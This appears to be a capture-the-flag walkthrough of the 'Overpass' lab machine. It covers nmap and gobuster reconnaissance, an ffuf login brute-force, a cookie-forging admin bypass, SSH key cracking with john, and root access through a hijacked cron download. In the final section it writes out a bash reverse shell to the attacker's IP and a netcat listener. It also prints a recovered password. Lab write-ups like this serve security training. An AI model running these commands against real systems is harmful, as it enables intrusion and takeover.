.png)
4 months ago
40 BOOK THIS SPACE FOR AD
ARTICLE AD
Another beautiful scenario is before you. This time, we will exploit the other machine and carry out some attacks both through the browser and through various tools.
It is very important for your abilities to be exposed to as many different scenarios as possible in this field.
Improve yourself tirelessly.
Do you want to start, punks?
You know what to do. Save the values you will use most as constants on the shell. Never wait.
You can find various wordlists in /usr/share/wordlists.
Now it’s time to save the target IP value to our local DNS, this is an important step for some of our processes. Save it in /etc/hosts file.
Send a ping to the target machine and check.
We are ready now!
We can go exploring. Using Nmap, perform a scan of the open doors of the target machine. This could reveal the network: nmap -sV -sC -oA nmap_results/target_machine -A -T4 --script=vuln $target_ip
Service Version Detection (-sV): Identifies versions of running services on open ports.Default Scripts (-sC): Executes standard scripts that come with nmap.Output Formats (-oA): Saves the scan results in normal, grepable, and XML formats.Aggressive Scan (-A): Combines OS detection, service version detection, script scanning, and traceroute.Timing Template (-T4): Speeds up the scan process.Vulnerability Scripts (--script=vuln): Runs scripts that check for vulnerabilities.You need to be patient. You will get good evidence from here.
We added a parameter for recording to the command so that you do not lose the results here and so that you can send specific queries. You can find them in the file location you specify.
We discovered that ports 22 (SSH) and 80 (HTTP) were open. Here we also have some additional notes about the version and potentially vulnerabilities.
Conduct an exploit investigation across versions.
There are some exploit approaches we can use for OpenSSH. Let’s download one for example: searchsploit -m linux/remote/45233.py
This python file is used for username enumeration. Check the content.
You should always explore how to use the script. Sometimes there are requirements for you to use it and you must install the necessary packages, it is always healthier to do these in a virtual environment you create.
We have deliberately received errors below. The Python version of the script you download may vary.
As you can see, it says we need to install a package. You can install this package and try running the script again.
We showed this as an example, we will not continue with this method.
We have a web server in front of us. We should go here and check the site.
You should check every detail that you can use in the real scenario and perform analysis on all possible pages. Conduct a directory reconnaissance attack to discover hidden pages and applications. We will use gobuster for this: gobuster dir -w $wordlist_dir -u ourtargetsite.thm -r
Depending on the length of the wordlist, it takes time for the result to appear.
As you can see, we discovered some pages. This is good news for us. In particular, we also have information that the /admin page is actively accessible.
Let’s go to the admin page and see what’s available.
The first thing that comes to mind is to try a brute force on the username and user password. This attack is often detected and blocked by firewalls in real scenarios. You should be wary of this.
As an example, let’s show you how to do this through the ffuf tool. Of course, there are different tools and you are free to use whatever you want.
First we need to explore the parameters we send with the POST request. You can learn this from the developer (f12) tools on your browser. You should look in the “Network” section. Let’s open this section and experiment with a random value.
You’ve seen the request payload form. We will use this.
Let’s go to the About section.
Some employees’ names are written, these could be potential usernames.
Let’s create our own wordlist.
Define this as a constant as “usernames_target”.
Try this command: ffuf -w $usernames_target:W1,$wordlist_pass:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://ourtargetsite.thm/admin -fc 200
We couldn’t get results. As we said, this is an example.
Let’s look at the source code of the admin page.
The first thing that catches our eye on the page are three separate .js files.
We can learn the working principle of the mechanism by looking at the “login.js” file.
It looks like an amateurish code flow with little thought to security principles. We can conduct research on this.
By examining the login.js file, we observe that a SessionToken cookie is created when the administrator credentials are validated successfully. This cookie is instrumental in maintaining the user's session and authenticating subsequent requests.
In the login.js file, the following actions typically occur:
User Login: When the admin enters their credentials (username and password) and submits the login form.Credential Verification: The credentials are sent to the server, where they are verified against stored data.SessionToken Generation: Upon successful verification of the admin credentials, the server generates a SessionToken.Cookie Setting: The SessionToken is then sent back to the client and stored as a cookie in the user's browser.There is a gap in this structure. In the login.js file, the function handling the login process checks the server response to determine if the credentials are correct. If the response indicates "Incorrect Credentials," it displays an error message. If the credentials are correct, it sets a SessionToken cookie with the returned token and redirects the user to the admin dashboard. It will allow us to add any cookie value.
The code stipulates that if the server responds with “Incorrect credentials” access to the administrator’s panel should be denied to the user. Conversely, if the server does not respond with “Incorrect credentials” a session token should be issued to the user, granting them access to the administrative panel.
Let’s check our theory. Open “Storage” section.
Then add (+) item.
Now we restart the page.
We got RSA key. We also have the name “james” and “paradox”. Save it now.
We have id_rsa.hash file. We need to break this. We can use ssh2john to get the file into a format that we can use with john tool.
Now we can use john tool: john --wordlist=/usr/share/wordlists/rockyou.txt john_rsa
We got RSA passphrase.
Let’s create a connection request for this user via SSH. First, authorize the file containing the RSA you first saved.
Then connect: ssh -i id_rsa james@10.10.87.118
We got connection.
The first thing you should do is to check the privilege authority, we will increase the authority if necessary.
Ops… Listing our permisisons requires a password. Let’s look at the evidence.
We need to find a file that is “overpass”.
There is a strange encrypted message. We need to try break it. Use it https://www.dcode.fr/rot-47-cipher
We have a result. Let’s keep this:
[{"name":"System","pass":"saydrawnlyingpicture"}]We need to list SUID executables: find / -perm -u=s -type f 2>/dev/null
There aren’t many useful details. Keep searching.
Let’s conduct an investigation on “crontab”.
We captured a recording of an interesting “.sh” file. “Curl” is running.
The request is made to “overpass.thm”. We might be able to modify the /etc/hosts file on our machine so that the target downloads a malicious “buildscript.sh” from us.
First, let’s create “/downloads/src/” in our own locale to preserve the file location.
Now create “buildscript.sh” and put the reverse shell code into it: bash -i >& /dev/tcp/10.10.255.233/9001 0>&1
Start a web server on our local machine.
Create a netcat listener: nc -nlvp 9001
Now let’s manipulate “/etc/hosts” on the target machine and add our own machine IP.
We are ready. Just wait to connection.
We got that.
Don’t give up on hacking.
Code for good.
^-^
Bengali (Bangladesh) · 
English (United States) ·